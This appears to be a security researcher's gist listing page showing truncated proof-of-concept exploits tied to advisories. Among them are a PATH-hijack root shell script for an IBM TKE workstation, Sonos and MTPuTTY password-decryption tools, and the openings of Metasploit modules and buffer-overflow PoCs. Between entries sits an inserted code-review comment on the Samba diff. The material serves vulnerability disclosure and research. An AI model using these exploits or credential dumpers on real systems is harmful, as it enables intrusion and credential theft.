@ykoster
ykoster / SonosController.ps1
Last active April 3, 2019 18:35
Sonos Controller for Windows ShareConfig.xml weak file permissions
# load System.Security for HMAC-SHA256
Add-Type -AssemblyName System.Security
$ip = "127.0.0.1"
$port = 3445
$configPath = "$env:ProgramData\Sonos,_Inc\runtime\ShareConfig.xml"
$sharePath = "$env:windir\media"
# the entropy value is hardcoded in the service and used for encrypting and decrypting the password of the Sonos user (DPAPI)
$entropy = [System.Text.Encoding]::Unicode.GetBytes("e51bd1fb-2783-4261-95b8-027afc69e8af");
@ykoster
ykoster / gotroot.sh
Created March 31, 2019 07:28
IBM Trusted Key Entry (TKE) workstation local privilege escalation
#!/bin/bash
OLDPATH=$PATH
trap cleanup EXIT
export PATH=.:$PATH
/bin/cat > $HOME/iptables << __EOF
#!/bin/bash
/bin/su -c /usr/bin/xterm
__EOF
@ykoster
ykoster / mordan.c
Created June 4, 2019 06:40
Mordan is a program that can be used to determine the internal state of the java.util.Random() random number generator
/* ---------------------------------------------------------------------
* mordan.c
* revision 0.4
* ---------------------------------------------------------------------
* November 2005, Yorick Koster, ITsec Security Services
* ---------------------------------------------------------------------
* Mordan is a program that can be used to determine the internal state
* of the java.util.Random() random number generator. In order to do so,
* mordan requires two integer values (created with Random.nextInt())
* or one long value (created with Random.nextLong()).
@ykoster
ykoster / Invoke-MTPuTTYConfigDump.psm1
Last active February 27, 2024 13:50
Invoke-MTPuTTYConfigDump - read an MTPuTTY configuration file, decrypt the passwords and dump the result
<#
.Synopsis
Decrypt an MTPuTTY configuration file
.Description
Read an MTPuTTY configuration file, decrypt the passwords and dump the result
.Parameter ConfigFile
Path to the MTPuTTY configuration file
@ykoster
ykoster / evolution_tnef_plugin_multil.rb
Created October 1, 2019 14:10
yTNEF/Evolution TNEF Attachment decoder plugin directory traversal & buffer overflow vulnerabilities - proof of concept (https://www.akitasecurity.nl/advisory/AK20090601/ytnef_evolution_tnef_plugin_traversal___overflow_vulnerabilities.html)
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::SMTPDeliver
def initialize(info = {})
super(update_info(info,
'Name' => 'Evolution TNEF Attachment decoder plugin directory traversal and buffer overflow vulnerabilities',
'Description' => %q{
@ykoster
ykoster / pa_race.sh
Created October 1, 2019 14:29
PulseAudio local race condition privilege escalation vulnerability - proof of concept (https://www.akitasecurity.nl/advisory/AK20090602/pulseaudio_local_race_privilege_escalation_vulnerability.html)
#!/bin/bash
pulseaudio=`which pulseaudio`
workdir="/tmp"
#workdir=$HOME
id=`which id`
shell=`which sh`
trap cleanup INT
@ykoster
ykoster / parse_srv.c.diff
Created October 7, 2019 12:31
MS04-037: Vulnerability in Windows Shell Could Allow Remote Code Execution - proof of concept
--- download/samba-3.0.2a/source/rpc_parse/parse_srv.c.O Fri May 21 21:18:14 2004
+++ download/samba-3.0.2a/source/rpc_parse/parse_srv.c Sat Jun 12 18:26:37 2004
@@ -28,6 +28,450 @@
#undef DBGC_CLASS
#define DBGC_CLASS DBGC_RPC_PARSE
+/*
+ * Exploit code for "Microsoft's Explorer and Internet Explorer long
+ * share name buffer overflow" discovered by Rodrigo Gutierrez.
+ * $rev 1.5, Yorick Koster, June 12, 2004
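Review bot: the hunk header `@@ -28,6 +28,450 @@` declares 444 added lines, but only the opening comment block (`+/*` through `+ * $rev 1.5, Yorick Koster, June 12, 2004`) is visible in this excerpt, so the added body cannot be reviewed here. What is visible shows the proof-of-concept being patched directly into Samba 3.0.2a's RPC parser (source/rpc_parse/parse_srv.c) rather than kept as a stand-alone program, so any build from this tree is a lab-only instance and the comment should say so explicitly; the left-hand path's `.O` suffix also indicates a hand-made backup copy rather than a clean upstream checkout, which the header comment should document alongside the base version.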
@ykoster
ykoster / EudoraBoF.c
Created October 7, 2019 12:33
Eudora 5.2.1 buffer overflow through overly long attachment filename - proof of concept
/*
* Summary : Eudora 5.2.1 has a remotely exploitable buffer overflow
* This vulnerability can be exploited by spoofing an attachment
* that has an overly long filename. An overly long filename will
* cause ECX to be overwritten, this value is later used in EIP,
* thus allowing the execution of arbitrary code.
* Note that the filename must begin with a backslash character
* in order to trigger the buffer overflow. Dot characters are
* not needed, but will trigger the buffer overflow sooner
*
@ykoster
ykoster / EMFexp.c
Created October 7, 2019 12:33
Enhanced Meta File arbitrary memory access vulnerability - proof of concept
/* -----------------------------------------------------------------------------
* Enhanced Meta File arbitrary memory access vulnerability
* Revision 0.1, Yorick Koster, November 5th, 2004
* -----------------------------------------------------------------------------
* Summary:
* ---------
* A memory access flaw has been discovered in the
* GetEnhMetaFilePaletteEntries() [1] function. This flaw can be used to crash
* programs that call this function. Furthermore, it is also possible to copy
* arbitrary parts of memory into a buffer that is passed to the
@ykoster
ykoster / ms12_025_dotnet_encoderparameter.rb
Created October 7, 2019 12:36
.NET Framework EncoderParameter integer overflow vulnerability - proof of concept
##
# run 'rundll32 dfshim CleanOnlineAppCache' to clear ClickOnce cache
##
require 'msf/core'
require 'base64'
require 'digest/sha1'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking